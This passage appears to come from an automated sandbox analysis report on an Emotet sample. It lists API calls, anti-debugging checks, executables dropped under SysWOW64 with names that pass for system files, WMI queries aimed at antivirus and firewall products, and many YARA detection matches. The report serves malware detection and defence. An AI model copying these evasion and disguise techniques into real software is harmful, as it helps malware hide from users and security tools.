                      Source: C:\Users\user\Desktop\MV9tCJw8Xr.exeCode function: 1_2_00412013 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exeCode function: 22_2_00A41F00 GetCurrentProcessId,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,FindCloseChangeNotification,OpenProcess,QueryFullProcessImageNameW,CloseHandle,
                      Source: C:\Users\user\Desktop\MV9tCJw8Xr.exeCode function: 1_2_0041CCF2 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__invoke_watson,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__invoke_watson,__decode_pointer,__decode_pointer,__decode_pointer,
                      Source: C:\Users\user\Desktop\MV9tCJw8Xr.exeCode function: 1_2_021E378C mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\Desktop\MV9tCJw8Xr.exeCode function: 1_2_021E2E8C mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\Desktop\MV9tCJw8Xr.exeCode function: 1_2_02184ACB mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\Desktop\MV9tCJw8Xr.exeCode function: 1_2_021841CB mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\Desktop\MV9tCJw8Xr.exeCode function: 1_2_02180467 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exeCode function: 2_2_021D378C mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exeCode function: 2_2_021D2E8C mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exeCode function: 22_2_00A4EF44 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exeCode function: 22_2_00404E10 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exeCode function: 22_2_00403F70 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exeCode function: 22_2_02EB5B0E mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exeCode function: 22_2_02EB0456 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exeCode function: 22_2_02EB69AE mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exeCode function: 22_2_02EB095E mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exeCode function: 22_2_02F11030 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exeCode function: 23_2_00403F70 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exeCode function: 23_2_00404E10 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exeCode function: 23_2_02B65B0E mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exeCode function: 23_2_02B60456 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exeCode function: 23_2_02B669AE mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exeCode function: 23_2_02B6095E mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exeCode function: 23_2_02BC1030 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\DscCoreConfProv\execmodelproxy.exeCode function: 26_2_00403F70 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\DscCoreConfProv\execmodelproxy.exeCode function: 26_2_00404E10 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\DscCoreConfProv\execmodelproxy.exeCode function: 26_2_02C75B0E mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\DscCoreConfProv\execmodelproxy.exeCode function: 26_2_02C70456 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\DscCoreConfProv\execmodelproxy.exeCode function: 26_2_02C769AE mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\DscCoreConfProv\execmodelproxy.exeCode function: 26_2_02C7095E mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\DscCoreConfProv\execmodelproxy.exeCode function: 26_2_02CD1030 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\Windows.Graphics.Printing.Workflow.Native\COLORCNV.exeCode function: 27_2_00403F70 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\Windows.Graphics.Printing.Workflow.Native\COLORCNV.exeCode function: 27_2_00404E10 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\Windows.Graphics.Printing.Workflow.Native\COLORCNV.exeCode function: 27_2_0135095E mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\Windows.Graphics.Printing.Workflow.Native\COLORCNV.exeCode function: 27_2_013569AE mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\Windows.Graphics.Printing.Workflow.Native\COLORCNV.exeCode function: 27_2_01350456 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\Windows.Graphics.Printing.Workflow.Native\COLORCNV.exeCode function: 27_2_01355B0E mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\Windows.Graphics.Printing.Workflow.Native\COLORCNV.exeCode function: 27_2_030A1030 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\Desktop\MV9tCJw8Xr.exeCode function: 1_2_00412749 GetStartupInfoA,GetProcessHeap,GetProcessHeap,HeapAlloc,_fast_error_exit,GetVersionExA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,_fast_error_exit,_fast_error_exit,__RTC_Initialize,__ioinit,__amsg_exit,GetCommandLineA,___crtGetEnvironmentStringsA,__setargv,__amsg_exit,__setenvp,__amsg_exit,__cinit,__amsg_exit,__wincmdln,
                      Source: C:\Users\user\Desktop\MV9tCJw8Xr.exeCode function: 1_2_00412013 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                      Source: C:\Users\user\Desktop\MV9tCJw8Xr.exeCode function: 1_2_00416262 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                      Source: C:\Users\user\Desktop\MV9tCJw8Xr.exeCode function: 1_2_00416761 SetUnhandledExceptionFilter,__encode_pointer,
                      Source: C:\Users\user\Desktop\MV9tCJw8Xr.exeCode function: 1_2_00416783 __decode_pointer,SetUnhandledExceptionFilter,
                      Source: C:\Users\user\Desktop\MV9tCJw8Xr.exeCode function: 1_2_0041BCDF __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exeCode function: 2_2_00412013 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exeCode function: 2_2_00416262 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exeCode function: 2_2_00416761 SetUnhandledExceptionFilter,__encode_pointer,
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exeCode function: 2_2_00416783 __decode_pointer,SetUnhandledExceptionFilter,
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exeCode function: 2_2_0041BCDF __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exeCode function: 22_2_00A478B2 SetUnhandledExceptionFilter,
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exeCode function: 22_2_00A4C918 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exeCode function: 22_2_00A473A8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exeCode function: 22_2_00A4771F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exeProcess created: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exe 'C:\Windows\SysWOW64\DefaultPrinterProvider\\tokenbinding2.exe' YAQAADwAAABEAGUAZgBhAHUAbAB0AFAAcgBpAG4AdABlAHIAUAByAG8AdgBpAGQAZQByAFwASwBCAEQASABFAEIAAAA=
                      Source: C:\Users\user\Desktop\MV9tCJw8Xr.exeCode function: 1_2_0041D073 cpuid
                      Source: C:\Users\user\Desktop\MV9tCJw8Xr.exeCode function: GetThreadLocale,GetLocaleInfoA,GetACP,
                      Source: C:\Users\user\Desktop\MV9tCJw8Xr.exeCode function: _strcpy_s,__snprintf_s,GetLocaleInfoA,LoadLibraryA,
                      Source: C:\Users\user\Desktop\MV9tCJw8Xr.exeCode function: GetLocaleInfoA,
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exeCode function: GetThreadLocale,GetLocaleInfoA,GetACP,
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exeCode function: _strcpy_s,__snprintf_s,GetLocaleInfoA,LoadLibraryA,
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exeCode function: GetLocaleInfoA,
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exeCode function: EnumSystemLocalesW,
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exeCode function: GetLocaleInfoW,
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exeCode function: GetLocaleInfoW,
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exeCode function: EnumSystemLocalesW,
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exeCode function: EnumSystemLocalesW,
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exeCode function: EnumSystemLocalesW,
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exeCode function: GetLocaleInfoW,
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exeCode function: GetLocaleInfoW,
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,
                      Source: C:\Users\user\Desktop\MV9tCJw8Xr.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exe | Queries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exe | Queries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exe | Queries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exe | Queries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                      Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                      Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                      Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                      Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                      Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                      Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                      Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                      Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
                      Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                      Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                      Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exe | Queries volume information: C:\ VolumeInformation
                      Source: C:\Users\user\Desktop\MV9tCJw8Xr.exe | Code function: 1_2_004188D6 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exe | Code function: 22_2_00A553D2 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,
                      Source: C:\Users\user\Desktop\MV9tCJw8Xr.exe | Code function: 1_2_00424371 GetVersion,GetVersion,GetVersion,GetVersion,GetVersion,RegisterWindowMessageA,
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                      Lowering of HIPS / PFW / Operating System Security Settings:

                      Changes security center settings (notifications, updates, antivirus, firewall)
                      Source: C:\Windows\System32\svchost.exe | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center cval
                      Source: C:\Windows\System32\svchost.exe | WMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
                      Source: C:\Windows\System32\svchost.exe | WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : FirewallProduct
                      Source: C:\Windows\System32\svchost.exe | WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiVirusProduct
                      Source: C:\Windows\System32\svchost.exe | WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiSpywareProduct

                      Stealing of Sensitive Information:

                      Yara detected Emotet
                      Source: Yara match | File source: 0000001C.00000002.442107298.0000000002E30000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000001F.00000002.464467088.0000000002971000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000001A.00000002.428286473.0000000000401000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000001B.00000002.439198093.00000000030A4000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000017.00000002.419691301.0000000002B60000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000001E.00000002.447921757.0000000000401000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000002.409946208.00000000020C4000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000020.00000002.468787553.00000000029E4000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000022.00000002.470554430.0000000000401000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000025.00000002.493970869.0000000002AE0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000001D.00000002.446724023.0000000003274000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000024.00000002.482749716.00000000025B0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000024.00000002.483313060.0000000002671000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000001C.00000002.439928850.0000000000401000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000020.00000002.468454177.0000000002980000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000001B.00000002.433437120.0000000000401000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000016.00000002.413932910.0000000002EB0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000001B.00000002.438746003.0000000001350000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000001E.00000002.449294722.0000000001310000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000024.00000002.483058248.0000000002614000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000001F.00000002.463773326.00000000028B0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000001.00000002.243322939.00000000021E1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000002.409716178.00000000005B0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000001A.00000002.429639515.0000000002CD4000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000001D.00000002.446019093.0000000001850000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000016.00000002.414052123.0000000002F14000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000022.00000002.477958707.00000000031B0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000025.00000002.492699981.0000000000401000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000017.00000002.417949677.0000000000401000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000002.410029176.00000000021D1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000001A.00000002.429459440.0000000002C70000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000020.00000002.465519796.0000000000401000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000001F.00000002.464108385.0000000002914000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000001.00000002.243267422.0000000002180000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000001.00000002.243296865.00000000021C4000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000001E.00000002.449645390.0000000002D64000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000001C.00000002.442504698.0000000002E94000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000001D.00000002.443777034.0000000000401000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000022.00000002.478389759.0000000003214000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000017.00000002.420026339.0000000002BC4000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000025.00000002.494214004.0000000002B44000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000016.00000002.412800025.0000000000401000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 32.2.jscript9.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 2.2.KBDHEB.exe.5b053f.2.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 30.2.msrd2x40.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 22.2.tokenbinding2.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 37.2.catsrvut.exe.2ae279e.3.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 29.2.KBDINTAM.exe.185279e.2.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 31.2.MCCSEngineShared.exe.28b279e.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 27.2.COLORCNV.exe.135052e.3.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 31.2.MCCSEngineShared.exe.28b279e.1.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 36.2.msvcr100_clr0400.exe.25b279e.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 23.2.KBDHEB.exe.2b6279e.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 29.2.KBDINTAM.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 22.2.tokenbinding2.exe.2eb279e.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 23.2.KBDHEB.exe.2b6052e.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 30.2.msrd2x40.exe.131052e.2.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 26.2.execmodelproxy.exe.2c7052e.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 34.2.wmvdspa.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 34.2.wmvdspa.exe.31b052e.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 1.2.MV9tCJw8Xr.exe.218053f.2.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 36.2.msvcr100_clr0400.exe.2670000.3.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 37.2.catsrvut.exe.2ae052e.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 26.2.execmodelproxy.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 28.2.usp10.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 32.2.jscript9.exe.298279e.2.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 34.2.wmvdspa.exe.31b279e.3.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 26.2.execmodelproxy.exe.2c7052e.2.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 31.2.MCCSEngineShared.exe.2970000.3.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 23.2.KBDHEB.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 32.2.jscript9.exe.298052e.3.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 30.2.msrd2x40.exe.131279e.3.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 34.2.wmvdspa.exe.31b279e.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 1.2.MV9tCJw8Xr.exe.2181f3f.1.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 2.2.KBDHEB.exe.21d0000.4.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 27.2.COLORCNV.exe.135052e.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 28.2.usp10.exe.2e3279e.3.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 1.2.MV9tCJw8Xr.exe.218053f.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 28.2.usp10.exe.2e3279e.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 27.2.COLORCNV.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 29.2.KBDINTAM.exe.185279e.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 31.2.MCCSEngineShared.exe.28b052e.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 23.2.KBDHEB.exe.2b6052e.2.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 1.2.MV9tCJw8Xr.exe.21e0000.4.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 27.2.COLORCNV.exe.135279e.2.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 30.2.msrd2x40.exe.131279e.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 36.2.msvcr100_clr0400.exe.25b052e.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 27.2.COLORCNV.exe.135279e.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 34.2.wmvdspa.exe.31b052e.2.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 26.2.execmodelproxy.exe.2c7279e.3.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 37.2.catsrvut.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 26.2.execmodelproxy.exe.2c7279e.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 28.2.usp10.exe.2e3052e.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 2.2.KBDHEB.exe.5b1f3f.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 23.2.KBDHEB.exe.2b6279e.3.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 22.2.tokenbinding2.exe.2eb052e.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 36.2.msvcr100_clr0400.exe.25b052e.2.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 2.2.KBDHEB.exe.20c4000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 2.2.KBDHEB.exe.5b053f.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 37.2.catsrvut.exe.2ae052e.2.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 32.2.jscript9.exe.298052e.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 22.2.tokenbinding2.exe.2eb052e.2.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 36.2.msvcr100_clr0400.exe.25b279e.1.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 32.2.jscript9.exe.298279e.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 28.2.usp10.exe.2e3052e.2.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 1.2.MV9tCJw8Xr.exe.2181f3f.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 1.2.MV9tCJw8Xr.exe.21c4000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 2.2.KBDHEB.exe.20c4000.3.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 37.2.catsrvut.exe.2ae279e.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 31.2.MCCSEngineShared.exe.28b052e.2.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 30.2.msrd2x40.exe.131052e.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 22.2.tokenbinding2.exe.2eb279e.3.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 29.2.KBDINTAM.exe.185052e.3.unpack, type: UNPACKEDPE
